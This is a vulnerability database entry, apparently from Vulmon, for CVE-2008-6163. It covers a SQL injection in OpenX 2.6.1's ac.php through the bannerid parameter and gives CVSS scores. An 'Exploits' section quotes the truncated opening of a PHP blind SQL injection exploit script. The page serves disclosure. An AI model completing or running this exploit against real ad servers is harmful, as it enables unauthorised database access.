7.5
CVSSv2

CVE-2008-6163

Published: 20/02/2009 Updated: 29/09/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in www/delivery/ac.php in OpenX 2.6.1 allows remote malicious users to execute arbitrary SQL commands via the bannerid parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

openx openx 2.6.1

Exploits

<html> <head><title>OpenX Remote Blind SQL Injection Exploit By d00m3r4ng</title></head> <body><center> <?php //discovered by d00m3r4ng //exploit coded by d00m3r4ng //contact: d00m3r4ng[at]gmailcom set_time_limit(0); function sockr($j, $exp, $asc){ extract ($_POST); global $l; if($socket = @fsockopen($h ...